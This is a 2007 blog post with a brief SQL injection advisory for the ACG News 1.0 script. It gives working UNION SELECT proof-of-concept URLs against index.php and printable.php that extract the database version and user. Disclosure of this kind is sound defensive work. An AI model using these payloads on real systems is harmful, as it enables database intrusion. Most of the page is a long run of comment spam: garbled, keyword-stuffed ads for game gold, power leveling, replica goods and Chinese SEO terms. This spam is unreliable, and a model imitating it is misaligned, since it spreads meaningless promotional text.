Software: ACG News 1.0
Vendor link: http://www.altercoder.com
Vendor Demo link: http://acgnews.uw.hu/index.php
Attack: SQL Injection
Discovered by: David Sopas Ferreira a.k.a SmOk3 < smok3f00 at gmail.com >
SQL Injection
-------------
An attacker may execute arbitrary SQL statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information. Vulnerable variables are $aid and $catid on index.php file.
Proof of Concept:
index.php?menu=showarticle&aid=[SQL INJECTION]
index.php?menu=showarticle&aid=-3 UNION ALL SELECT 1,@@version,3,4,5,user(),7
index.php?menu=showcat&catid=[SQL INJECTION]
index.php?menu=showcat&catid=-3 UNION ALL SELECT 1,@@version
Solution:
Your script should filter metacharacters from user input.
Vendor (Liam Dawe) is already fixing all the problems that I found out, a few more were added by myself...
Proof Of Concept
SQL Injection:
printable.php?aid=-3%20UNION%20ALL%20SELECT%201,@@version
,3,4,5,user(),7
Tuesday, August 28, 2007
ACG News SQL Injection
Subscribe to:
Post Comments (Atom)
35 comments:
thanks ur information
it very useful
u r blog Is very nice
Small business website design
cqx
The lives of most menacheter des kamas are determined by dofus kamastheir enviroment.acheter des kamasThey accept the circumstances dofus kamasamid which but even with good will.
cuicui
Her memory took her forward ?wow goldto her high schoolbuy wow gold prom6. She rememberedwow power leveling the beautiful pink dressworld of warcraft gold that her father cheap wow goldhad bought her. Atwow gold the prom, she recognised wow power levelinga boy that shebuy wow goldher started really liked.
Scientists have come wholesale replica handbagsup with a theoryreplica designer handbagsfor why time flies louis vuitton replica handbagswhen you are havingdesigner replica handbags wholesale fun - and drags coach replica handbagswhen you are bored.designer replica handbags Scans have shownreplica coach handbags that patterns of activityswiss replica watchesin the brain changereplica jacob watches depending on how we replica coach walletfocus on a task.gucci replica walletConcentrating on time replica louis vuitton walletpassing, as we chanel handbag replica walletdo when bored, will replica jewelrytrigger brain activity replica tiffany jewelry wholesalewhich will make it replica designer jewelryseem as though the clockReplica Wallet is ticking more slowly.Jewelry replicaThe research, by the jewelryFrench Laboratory of Neurobiology Cheap Coach Handbagsand Cognition, is fashion Handbagspublished in the magazine Science.
wow gold
wow gold
eve isk
wow power leveling
wow power leveling
wow power leveling
wow power leveling
warhammer gold
warhammer power leveling
bestchina traveland
uggsor
ghd straighteners
Tiffany Rings
Tiffany Earrings
WoW shares many wow gold of its features with previously launched games. Essentially, you battle with Cheapest wow gold monsters and traverse the countryside, by yourself or as a buy cheap wow gold team, find challenging tasks, and go on to higher Cheap Wow Gold levels as you gain skill and experience. In the course of your journey, you will be gaining new powers that are increased as your skill rating goes up. All the same, in terms of its features and quality, that is a ture stroy for this.WoW is far ahead of all other games of the genre the wow power leveling game undoubtedly is in a league of its own and cheapest wow gold playing it is another experience altogether.
Even though WoW is a wow gold cheap rather complicated game, the controls and interface are done in buy warhammer gold such a way that you don't feel the complexity. A good feature of the game is that it buy wow items does not put off people with lengthy manuals. The instructions cannot be simpler and the pop up tips can help you start playing the game World Of Warcraft Gold immediately. If on the other hand, you need a detailed manual, the instructions are there for you to access. Buy wow gold in this site,good for you ,WoW Gold, BUY WOW GOLD.
When the Wow Gold wolf finally found the Buy Wow Goldhole in the chimney he crawled wow gold cheap down and KERSPLASH right into that kettle of water and that was cheapest wow gold the end of his troubles with the big bad wolf.
The next day the cheap wow gold cheapest wow gold little pig invited his mother over . She said "You see it is just as I told you. The way to gdpchinaget along in the world is to do world of warcraft gold things as well as you can." Fortunately for that little pig, he meinwowgold learned that lesson. And he just lived happily ever after!
When the Wow Gold wolf finally found the Buy Wow Goldhole in the chimney he crawled wow gold cheap down and KERSPLASH right into that kettle of water and that was cheapest wow gold the end of his troubles with the big bad wolf.
The next day the cheap wow gold cheapest wow gold little pig invited his mother over . She said "You see it is just as I told you. The way to gdpchinaget along in the world is to do world of warcraft gold things as well as you can." Fortunately for that little pig, he meinwowgold learned that lesson. And he just lived happily ever after!
看房子,買房子,建商自售,自售,台北新成屋,台北豪宅,新成屋,豪宅,美髮儀器,美髮,儀器,髮型,EMBA,MBA,學位,EMBA,專業認證,認證課程,博士學位,DBA,PHD,在職進修,碩士學位,推廣教育,DBA,進修課程,碩士學位,網路廣告,關鍵字廣告,關鍵字,廣告,課程介紹,學分班,文憑,牛樟芝,段木,牛樟菇,日式料理, 台北居酒屋,燒肉,結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,台北住宿,國內訂房,台北HOTEL,台北婚宴,飯店優惠,台北結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,住宿,訂房,HOTEL,飯店,造型系列,學位,牛樟芝,腦磷脂,磷脂絲胺酸,SEO,婚宴,捷運,學區,美髮,儀器,髮型,牛樟芝,腦磷脂,磷脂絲胺酸,看房子,買房子,建商自售,自售,房子,捷運,學區,台北新成屋,台北豪宅,新成屋,豪宅,學位,碩士學位,進修,在職進修, 課程,教育,學位,證照,mba,文憑,學分班,網路廣告,關鍵字廣告,關鍵字,SEO,关键词,网络广告,关键词广告,SEO,关键词,网络广告,关键词广告,SEO,台北住宿,國內訂房,台北HOTEL,台北婚宴,飯店優惠,住宿,訂房,HOTEL,飯店,婚宴,台北住宿,國內訂房,台北HOTEL,台北婚宴,飯店優惠,住宿,訂房,HOTEL,飯店,婚宴,台北住宿,國內訂房,台北HOTEL,台北婚宴,飯店優惠,住宿,訂房,HOTEL,飯店,婚宴,結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,台北結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,台北結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,台北結婚,婚宴場地,推車飲茶,港式點心,尾牙春酒,居酒屋,燒烤,美髮,儀器,髮型,美髮,儀器,髮型,美髮,儀器,髮型,美髮,儀器,髮型,小套房,小套房,進修,在職進修,留學,證照,MBA,EMBA,留學,MBA,EMBA,留學,進修,在職進修,牛樟芝,段木,牛樟菇,住宿,民宿,飯宿,旅遊,住宿,民宿,飯宿,旅遊,住宿,民宿,飯宿,旅遊,住宿,民宿,飯宿,旅遊,住宿,民宿,飯宿,旅遊,住宿,民宿,飯宿,旅遊,住宿,民宿,飯宿,旅遊,美容,美髮,整形,造型,美容,美髮,整形,造型,美容,美髮,整形,造型,美容,美髮,整形,造型,美容,美髮,整形,造型,美容,美髮,整形,造型,美容,美髮,整形,造型,設計,室內設計,裝潢,房地產,設計,室內設計,裝潢,房地產,設計,室內設計,裝潢,房地產,設計,室內設計,裝潢,房地產,設計,室內設計,裝潢,房地產,設計,室內設計,裝潢,房地產,設計,室內設計,裝潢,房地產,設計,室內設計,裝潢,房地產,進修,在職進修,MBA,EMBA,進修,在職進修,MBA,EMBA,進修,在職進修,MBA,EMBA,進修,在職進修,MBA,EMBA,進修,在職進修,MBA,EMBA,進修,在職進修,MBA,EMBA,進修,在職進修,MBA,EMBA,住宿,民宿,飯店,旅遊,美容,美髮,整形,造型,設計,室內設計,裝潢,房地產,進修,在職進修,MBA,EMBA,關鍵字排名,網路行銷,关键词排名,网络营销,網路行銷,關鍵字排名,关键词排名,网络营销,羅志祥,周杰倫,五月天,蔡依林,林志玲,羅志祥,周杰倫,五月天,蔡依林,林志玲,PMP,在職專班,研究所在職專班,碩士在職專班,PMP,證照,在職專班,研究所在職專班,碩士在職專班
It was not long cheap wow goldbefore some one knocked at wow gold for salethe house-door and called, open the door, dear children, your mother is here, and wow gold cheap has brought something back with her for each of you. But the little cheapest wow goldkids knew that it was the wolf, by the rough voice. We will fastgg not open the door, cried they, you are not our mother. She has a soft, pleasant voice, but your voice is rough, you are the wolf.
Then the wolf went World Of Warcraft Goldaway to a shopkeeper and bought himself a great lump of chalk, ate this and made mmogap his voice soft with it. The he came back, knocked at the door of the house, and igsky called, open the door, dear children, your mother is here and Cheapest Wow Goldhas brought something back with her for each of you.
The lives of most menacheter des kamas are determined by dofus kamastheir enviroment.acheter des kamasThey accept the circumstances dofus kamasamid which but even with good
When the Wow Gold wolf finally found the Buy Wow Goldhole in the chimney he crawled wow gold cheap down and KERSPLASH right into that kettle of water and that was cheapest wow gold the end of his troubles with the big bad wolf.
game4power,buy cheap wow gold
The next day the cheap wow gold buy gold wow little pig invited his mother over . She said "You see it is just as I told you. The way to gamesavorget along in the world is to do world of warcraft gold things as well as you can." Fortunately for that little pig, he rpg-trader learned that lesson. And he just lived happily ever after!
cheap wow power leveling buy wow power leveling
wow gold
power leveling
sometimes you can go to earn the Pirates of the Burning Sea Gold for your own life and you can also get a lot of happiness in the game if you play the game well. you can brush the potbs gold to upgrade and then you are very strong. You think that you want to play the game well and then you can get the potbs Doubloon for your own. you can earn the potbs money alone and you can give some for your friends; it can make you very happy I think. As long as you play the game you can go to buy potbs Doubloon as the rewards in this game.
buy wow gold
buy wow gold
buy wow account
buy wow gold
wow gold
wow gold
wow account
wow gold
To every game player angels gold is very import. My friend gave me some angels online gold, he said that I could buy angels gold, but I did not have money, then I played it all my spare time. From then on, I got some cheap angels online gold.
Once I played Anarchy, I did not know how to get strong, someone told me that you must have Archlord gold. He gave me some Archlord money, he said that I could buy Archlord gold, but I did not have money, then I played it all my spare time. From then on, I got some archlord online Gold, if I did not continue to play it, I can sell cheap Archlord gold to anyone who want.
sometimes you can go to earn the mabinogi gold for your own life and you can also get a lot of happiness in the game if you play the game well. you can brush the cheap mabinogi to upgrade and then you are very strong. You think that you want to play the game well and then you can get the mabinogi money for your own. you can go to buy mabinogi gold alone and you can give some for your friends; it can make you very happy I think. As long as you play the game you can get the mabinogi online gold as the rewards in this game.
I knew the Metin2 gold so I always try my best to earn them more and more to make myself strong. I have never played the game before, at the beginning I did not know what is so I went to kill the monsters with the Metin2 yang that I earned with myself in the game. I will duty bound to a friend to help brush the Cheap metin2 yang together with my friends. I spend a good relationship is then fly to tears. If my levels are very high, I can go to Buy metin2 gold more and more and I will not depend on my friends to help me to earn them. I get some Cheap metin2 gold as the gifts to encourage me.
Do you like playing in the game which you need to use runescape gold, when you do not buy runescape, you must borrowrs gold from friends, or you get runescape money. If you getcheap rs gold, you can continue this game.
Do you like playing in the game which you need to use wonderland Gold, when you do not have wonderland online Gold, you must borrow wonderland money from friends, or you
buy wonderland Gold. If you get cheap wonderland online Gold, you can continue this game.
Do you know eve isk? I like it.
My brother often go to the internet bar to buy eve online isk and play it.
After school, He likes playing games using these buy isk with his friend.
I do not like to play it. Because I think that it not only costs much money but also spend much time. One day, he give me many cheap eve isk and play the game with me.
I came to the bar following him and found buy eve online isk was so cheap. After that, I also go to play game with him.
Do you know fiesta Gold? I like it.
My brother often go to the internet bar to buy fiesta money and play it.
After school, He likes playing games using these fiesta online gold with his friend.
I do not like to play it. Because I think that it not only costs much money but also spend much time. One day, he give me many buy fiesta Gold and play the game with me.
I came to the bar following him and found fiesta online money was so cheap. After that, I also go to play game with him.
I like hero gold very much because it is very useful. In fact at first sight I have fallen in love with hero online gold. So no matter how much I have spent to buy hero gold, I never regret. Because of hero online money, I meet a lot of friends. So I never hesitate to buy hero money.
I like holic gold very much. Since I entered into this game, I learnt skills to earn holic money. Thanks to holic online gold let me know a lot of friends. It is my habit to buy holic online money, and I get some cheap holic gold from my friends and Internet.
I want give they happy time, twelve sky Gold, I work here with 12sky gold. Though, I can not make much money, twelvesky Gold, But I want to Exercise myself, 12Sky Silver Coins, I get up early 12 sky goldYou smart and buy Sword of the New World Vis, you play the game is right, Sword of the New World Gold. you have a wonderful time, buy vis, I have it cheap snw vis, I buy Sword of the New World money.
If you are cheap wow gold trying any unknown cheats to earn gold, you would cheapest wow gold face some problem and your account will be black out. So don't try to wow gold find cheats instead try to world of warcraft gold sale follow the guideline of world of warcraft. These tips could Cheap Wow Goldwork as gold cheat and can help a lot to earn gold and money. World of Warcraft is the most exiting online game and while Playing the game most of the players struggle wow power leveling to earn a lot of gold.
Most of the players World Of Warcraft Goldtry search cheat code for this game to earn gold. This wow gold cheaparticle will help Wow Goldyou a lot to earn more and more gold.The best way to earn gold in this online game is by going through the guidelines wow gold for saleand other information about itemchannel.comthe game that are available on the internet .
buy [url=http://www.thplay.com/]wow gold[/url],cheap [url=http://www.gamesalevip.com/]wow gold[/url],power [url=http://www.gamesalevip.com/]wow power leveling[/url],world of warcrft gold.cheep [url=http://www.thewowgold.net/]wow gold[/url],world of warcrft gold.
I can get Perfect World Gold cheaply,
Yesterday i givePerfect World moneyfor my brother.
i hope him like it. iBuy Perfect World Gold to him as birthday present.
i like the Perfect World Silver very much.
I usually buycheap Perfect World Gold and keep it in my store.
I enjoy the pw gold.
I can get Pirates of the Burning Sea Gold cheaply,
Yesterday i want to buy potbs goldfor my brother.
i hope him like it. i will buy potbs Doubloon for him
as birthday present. i like the potbs money very much.
I usuallybuy potbs Doubloon and keep it in my store.
Do you know the fiesta Gold, in the game you need the
fiesta money. it can help you increase your level. My friends always asked me how to
buy fiesta Gold, and I do not know he spend how much money to buy the
fiesta online gold, when I see him in order to play the game and search which the place can buy the
fiesta online money. I am happy with him.
Do you know the tcos Gold, in the game you need the
chronicles of spellborn gold. it can help you increase your level. My friends always asked me how to buy the chronicles of spellborn Gold, and I do not know he spend how much money to buy the
tcos money, when I see him in order to play the game and search which the place can buy the
chronicles of spellborn money. I am happy with him.
Do you know the tcos Gold, in the game you need the chronicles of spellborn gold. it can help you increase your level. My friends always asked me how to buy
the chronicles of spellborn Gold, and I do not know he spend how much money to buy
tcos money, when I see him in order to play the game and search which the place can buy the
chronicles of spellborn money. I am happy with him.
Do you know the fiesta Gold, in the game you need the
fiesta money. it can help you increase your level. My friends always asked me how to
buy fiesta Gold, and I do not know he spend how much money to buy the
fiesta online gold, when I see him in order to play the game and search which the place can buy the
fiesta online money. I am happy with him.
Do you know the aion kina, in the game you need the aion gold. It can help you increase your level. My friends always asked me how to buy aion kina, and I do not know he spend how much money to buy the aion online kina, when I see him in order to play the game and search which the place can buy the
cheap aion kina. I am happy with him.
Do you know the dofus kama, in the game you need the kamas. It can help you increase your level. My friends always asked me how to buy dofus kamas, and I do not know he spend how much money to buy the dofus gold, when I see him in order to play the game and search which the place can buy the cheap kamas. I am happy with him.
Do you know the Asda Story gold,in the game you need the Asda Story money. It can help you increase your level. My friends always asked me how to
buy Asda Story Gold, and I do not know he spend how much money to buy the
Asda Story gold, when I see him in order to play the game and search which the place can buy the
cheap Asda Story gold. I am happy with him.
I can get Pirates of the Burning Sea Gold cheaply,
Yesterday i want to buy potbs goldfor my brother.
i hope him like it. i will buy potbs Doubloon for him
as birthday present. i like the potbs money very much.
I usuallybuy potbs Doubloon and keep it in my store.
I can get ro zeny cheaply,
Yesterday i want to buy ragnarok zenyfor my brother.
i hope him like it. i will buy iro zeny for him
as birthday present. i like the cheap zeny very much.
I usually buy ragnarok online zeny and keep it in my store.
As a new player , you may need some game guides or information to enhance yourself.
FFXI Gil is one of the hardest theme for every class at the beginning . You must have a good way to manage your FFXI gold.If yor are a lucky guy ,you can earn so many Final Fantasy XI gold by yourself . But if you are a not , I just find a nice way to buy FFXI Gil. If you need , you can buy cheap Final Fantasy XI Gold at our website . Go to the related page and check the detailed information . Once you have any question , you can connect our customer service at any time .
Making aion kinais the old question : Honestly there is no fast way to make lots of aion online kina . Sadly enough a lot of the people that all of a sudden come to with millions of aion gold almost overnight probably duped . Although there are a lot of ways to make lots of cheap aion kina here I will tell you all of the ways that I know and what I do to buy aion kina.
Do you know the 2moons dil, in the game you need the 2moons gold. It can help you increase your level. My friends always asked me how to
buy 2moons dil, and I do not know he spend how much money to buy the
2moon dil, when I see him in order to play the game and search which the place can buy the
cheap 2moons gold. I am happy with him.
Do you know the Asda Story gold,in the game you need the
Asda Story money. it can help you increase your level. My friends always asked me how to
buy Asda Story Gold, and I do not know he spend how much money to buy the
Asda Story gold, when I see him in order to play the game and search which the place can buy the
cheap Asda Story gold. I am happy with him.
Do you know the 2moons dil, in the game you need the 2moons gold. It can help you increase your level. My friends always asked me how to
buy 2moons dil, and I do not know he spend how much money to buy the
2moon dil, when I see him in order to play the game and search which the place can buy the
cheap 2moons gold. I am happy with him.
Do you know the Asda Story gold,in the game you need the
Asda Story money. It can help you increase your level. My friends always asked me how to
buy Asda Story Gold, and I do not know he spend how much money to buy the
Asda Story gold, when I see him in order to play the game and search which the place can buy the
cheap Asda Story gold. I am happy with him.
Do you know the aion kina, in the game you need the aion gold. It can help you increase your level. My friends always asked me how to buy aion kina, and I do not know he spend how much money to buy the aion online kina, when I see him in order to play the game and search which the place can buy the
cheap aion kina. I am happy with him.
Post a Comment